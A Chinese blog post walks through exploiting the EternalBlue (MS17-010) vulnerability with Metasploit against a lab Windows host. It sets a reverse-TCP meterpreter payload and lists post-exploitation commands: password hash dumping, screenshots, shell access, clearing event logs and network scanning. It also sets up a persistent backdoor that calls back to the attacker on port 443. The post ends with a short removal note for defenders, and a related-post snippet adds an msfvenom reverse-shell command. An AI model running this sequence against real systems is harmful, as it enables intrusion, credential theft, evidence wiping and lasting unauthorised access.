永恒之蓝(ms17-010)&&meterpreter模块简单使用

已于 2022-03-10 18:46:30 修改
阅读量1.3k 收藏 7
点赞数 4
文章标签: p2p 网络协议 网络
于 2022-03-09 21:11:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123384995
版权

永恒之蓝(ms17-010)

启动meterpreter

msfconsole

查询ms17-010,并使用攻击模块

search ms17-010
use 3

 设置目标ip,本机ip,payload

set rhosts 192.168.254.130
set lhost 192.168.254.129
set payload windows/x64/meterpreter/reverse_tcp

 查看配置

show options

 开始攻击

run

meterpreter模块简单使用

pwd    //打印当前工作目录
sysinfo    //查看系统信息
getuid    //获取当前权限的用户id


ps    //查看当前目标机上运行的进程列表和pid


screenshot    //截取目标主机当前屏幕

 

 

hashdump    //获取用户名与hash口令


shell    //获取目标主机shell

 

upload //上传一个文件

 

 

download    //下载一个文件

 

execute    //执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)

 

clearev    //清除日志

background    //将meterpreter放入后台(使用sessions -i重新连接到会话)


run vnc    //查看目标机的屏幕

run arp_scanner -r 192.168.254.0/24    //检测所在局域网中的存活主机

  

在meterpreter shell上通过以下命令建立持久性连接:

1.    run persistence -X -i 50 -p 443 -r 192.168.254.130
        -X:表示目标机开机自启动meterpreter
        -i 50:表示目标机每隔50秒自动连接攻击机
        -p 443:表示目标机将连接攻击机的443端口
        -r 192.168.254.130:表示目标机将主动连接192.168.254.130(即攻击机地址)
2.    exit
      use multi/handler
      set lhost 192.168.254.129
      set lport 443
      set payload windows/meterpreter/reverse_tcp
      run

目标机为了防御meterpreter脚本的持久性连接,需要手动删除本机上残留的meterpreter脚本,删除方法为:

1.删除C:\Windows\TEMP\下的vbs文件,本例中为OHQvGWf.vbs

 2.删除相应的注册表键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Z_l123
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
meterpreter 简单应用
发哥微课堂
01-12 2217
0x00:介绍 使用 metasploit 渗透下一台主机后,并不意味着渗透测试的结束,而接下来需要做的就是后渗透阶段,后渗透阶段在已经拿下目标主机的前提下,进行一系列获取敏感信息、利用这台机器为跳板机做其他主机的攻击等,主要使用的是 metasploit 中的 post 模块,也就是后渗透模块。 metasploit 也提供了一个后渗透的工具,就是 meterpreter,meterpret...
永恒之(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2565
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
内网渗透之多种方式实现内网穿透(详细)
qq_38348692的博客
09-03 1万+
靶机为win7 使用ms17_010_enternalbule获得meterpreter权限,在这里注意,设置payload是必须的,否则不能获得metepreter权限,直接弹到 创建跳板路由: run autoroute -s 192.168.10.0/24 创建路由 run autoroute -p 打印路由[在这里插入图片描述] 输入background退回metaploit可以看...
meterpreter模块
最新发布
qq_52712762的博客
05-21 514
meterpreter
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4261
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
永恒之(MS17-010)
BvxiE的博客
12-26 3955
温馨提醒:纯水文,如果不幸翻到这篇文章,可以立刻关闭!
三、Meterpreter
qq_59235193的博客
02-02 389
Meterpreter通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。Meterpreter是Metasploit框架的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希值获取、特权提升、跳板攻击等。
网安永恒之MS17-010检测工具.zip
03-01
永恒之,MS17-010,漏洞检测工具
永恒之ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之检测工具MS17-010漏洞扫描工具
06-28
"永恒之"是2017年引起全球关注的安全事件,主要由名为"MS17-010"的Windows系统漏洞引发。这个漏洞利用了微软Windows操作系统中的SMB(Server Message Block)服务,允许攻击者远程执行代码,从而控制受影响的系统...
永恒之检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
Meterpreter使用总结(2)之后渗透攻击模块
热门推荐
CODING...
02-08 1万+
meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况: (2)判断是否为虚拟机: 如果有时候我们渗透测试的时候发现获得的目标机器是一个虚拟机,就要打醒十二分精神了,有可能这个是对方设置的一个蜜罐系统。
漏洞复现 | MS17-010*(永恒之)漏洞复现
made_cola的博客
03-24 1825
永恒之漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
Kali——Meterpreter后渗透攻击模块-Metasploit的module模块衍生
qq_63167128的博客
03-07 986
​ 介绍:本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。 挂个链接:深信服产业教育中心 Meterpreter模块作为后渗透攻击(该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始)模块的实施通道,可以根据渗透目标需求进行灵活拓展,涉及范围:信息收集,口令攫取,权限提升,内网拓展等等 ​
Metasploit-ms17-010永恒之(X86使用
子曰小玖的博客
04-20 5387
Metasploit正题 搜索相关的漏洞插件 msf > search 17-010 搜索到了4个相关的插件: auxiliary/admin/smb/ms17_010_command auxiliary/scanner/smb/smb_ms17_010 exploit/windows/smb/ms17_010_eternalblue exploit/win...
永恒之复现-附带win7虚拟机安装教程
dangejinghong的博客
09-03 1329
以上就是我对永恒之的复现MS17-010(Eternal blue永恒之)漏洞利用+修复方法_RDrug的博客-CSDN博客MS17-010漏洞复现(带win7虚拟机安装,零基础)永恒之镜像墨言ink的博客-CSDN博客从大佬的博客中学到很多,也对这个漏洞更加了解。
meterpreter使用
weixin_30405421的博客
09-26 1480
0x01 系统命令 基本系统命令 1 background # 将当前会话放置后台 2 sessions # sessions –h 查看帮助 3 sessions -i <ID值> #进入会话 -k 杀死会话 4 bgrun / run # 执行已有的模块,输入run后按两下tab,列出已有的脚本 5 info # 查看已有...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 717
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
永恒之ms17-010虚拟机
05-10
常见的永恒之ms17-010虚拟机有Metasploitable、VulnHub等,你可以在官网上下载相应的虚拟机镜像,并通过虚拟机软件(如VMware、VirtualBox)进行安装和使用。需要注意的是,这种虚拟机仅用于学习和测试目的,不得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值